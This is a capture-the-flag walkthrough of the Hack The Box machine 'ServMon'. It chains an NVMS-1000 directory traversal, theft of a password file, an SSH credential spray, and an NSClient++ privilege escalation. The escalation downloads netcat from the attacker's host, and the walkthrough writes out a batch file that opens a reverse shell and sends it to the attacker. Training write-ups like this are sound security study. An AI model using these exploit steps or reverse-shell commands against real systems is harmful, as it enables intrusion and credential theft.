As always, let's start with an nmap scan:

ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.184 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); nmap -A -p$ports 10.10.10.184 -o nmap

We see quite a few ports open.
Let's check with the ftp first, as anonymous login is enabled.

ftp 10.10.10.184 #login as anonymous

ftp> ls
01-18-20  12:05PM       <DIR>          Users
ftp> ls Users
01-18-20  12:06PM       <DIR>          Nadine
01-18-20  12:08PM       <DIR>          Nathan
ftp> ls Users/Nadine
01-18-20  12:08PM                  174 Confidential.txt
ftp> ls Users/Nathan
01-18-20  12:10PM                  186 Notes to do.txt
ftp> 

So, we have a few very interesting files here. Let's get them.

ftp> cd Users/Nadine/
ftp> get Confidential.txt
ftp> cd ../Nathan/
ftp> get Notes\ to\ do.txt

Now, let's check if we have write permissions here.

ftp> mkdir test
550 Access is denied. 
ftp> 

So, it seems like we don't have write permission here. Let's check the files that we downloaded.

root@kali:~/hackthebox/servmon# cat Confidential.txt 
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

So, there is a Passwords.txt file in Nathan's Desktop.

Now, let's check the other file:

root@kali:~/hackthebox/servmon# cat Notes\ to\ do.txt 
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

Okay, let's check what else do we have here.
Let's try to curl the website.

root@kali:~/hackthebox/servmon# curl http://10.10.10.184/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <title></title>
    <script type="text/javascript">
        window.location.href = "Pages/login.htm";
    </script>
</head>
<body>
</body>
</html>

It seeems pretty simple, its using JS to redirect us, let's use Firefox to check it out.
Opening the website with Firefox, we see that we are taken to a login page, and the title of the page is, "NVMS-1000".
Interesting.
Let's look if we have a publicly available exploit for it!

searchsploit NVMS

So, we have one, Directory Traversal.

cp /usr/share/exploitdb/exploits/hardware/webapps/47774.txt .

root@kali:~/hackthebox/servmon# cat 47774.txt 
# Title: NVMS-1000 - Directory Traversal
# Date: 2019-12-12
# Author: Numan Türle
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html

POC
---------

GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response
---------

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Let's fire up burp and try the directory traversal.
Catch a request being sent to the server, and send it to repeater.

Now, sending this request:

GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

We get the following response:

HTTP/1.1 200 OK
Content-type: 
Content-Length: 92
Connection: close
AuthInfo: 

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Nice, now let's try the Passwords.txt file in Nathan's Desktop.

GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Content-type: text/plain
Content-Length: 156
Connection: close
AuthInfo: 

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

Now, let's save these passwords in a file.

User

vi pass.txt

And, then paste it in.

Now, let's make another file of the usernames that we know.

vi users.txt

Nadine
Nathan
Administrator

Now, let's try spray these credentials on SSH.

msfconsole

use auxiliary/scanner/ssh/ssh_login

options
set rhosts 10.10.10.184
set user_file users.txt
set pass_file pass.txt
run

Nice, we get a hit!

[+] 10.10.10.184:22 - Success: 'Nadine:L1k3B1gBut7s@W0rk'

Easy.

Now, let's exit Metasploit and login with ssh.

ssh Nadine@10.10.10.184
#Now enter the password L1k3B1gBut7s@W0rk

Look! We get a shell! Beautiful!

Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.
                                                    
nadine@SERVMON C:\Users\Nadine>   

Nice, now you can go get the user.txt file.

I'll load up powershell as I prefer working in it than in a normal shell.

Administrator

nadine@SERVMON C:\Users\Nadine>powershell.exe -ExecutionPolicy bypass
Windows PowerShell                                          
Copyright (C) Microsoft Corporation. All rights reserved.   
                                                            
Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\Nadine> 
PS C:\Users\Nadine> whoami /all

Okay, now let's try getting some information about the system.

PS C:\Users\Nadine> systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
ERROR: Access denied
PS C:\Users\Nadine>

Yikes, okay. That's disallowed, too.

Going back the notes of Nathan, we see that he talks about NSClient. Let's see what that is and if we have an exploit for it.

searchsploit nsclient

Nice, we do have an exploit! And guess what? It is for Privilege Escalation. Nice.

cp /usr/share/exploitdb/exploits/windows/local/46802.txt .

Now, in our victim machine:

cd "C:\Program Files\NSClient++"
type .\nsclient.ini

Here you should see:

; Undocumented key          
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1

Nice, now we have the password.
Also, CheckExternalScripts and Scheduler already seem to be enabled.

Now, let's download netcat.

cd C:\Temp\
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.80:80/nc.exe','C:\Temp\nc.exe')"

Now, we need a bat file to use netcat to send us a reverse shell. For that, in your Kali machine make a new file:

vi evil.bat 

@echo off 
C:\Temp\nc.exe 10.10.14.78 4444 -e cmd.exe

Now, let's download this file.

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.80:80/evil.bat','C:\Temp\abhizer.bat')"

Now, because only 127.0.0.1 is an allowed host, we can forward the port.

But, before that, le'ts try curling it.

curl https://127.0.0.1:8443/

We get an error, its because curl is set as some kind of an alias in PowerShell. I don't like that, so let's remove it.

Remove-Item alias:curl
curl https://127.0.0.1:8443/

Now when we try to curl it, we get that the certificate is untrusted. Which is fine.

Let's forward that port. Quit the current ssh session and then:

ssh Nadine@10.10.10.184 -L 8443:127.0.0.1:8443

Now, from your local machine:

curl -s -k -u admin:ew2x6SsGTxjRwXOT -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/abhizer.bat --data-binary @evil.bat
Added abhizer as scripts\abhizer.bat

Now, let's set up a ssh listener first:

nc -nvlp 4444

And, now call the script:

curl -s -k -u admin:ew2x6SsGTxjRwXOT "https://127.0.0.1:8443/api/v1/queries/abhizer/commands/execute?time=1s"

You should have a reverse shell as Administrator now!
Congratulations!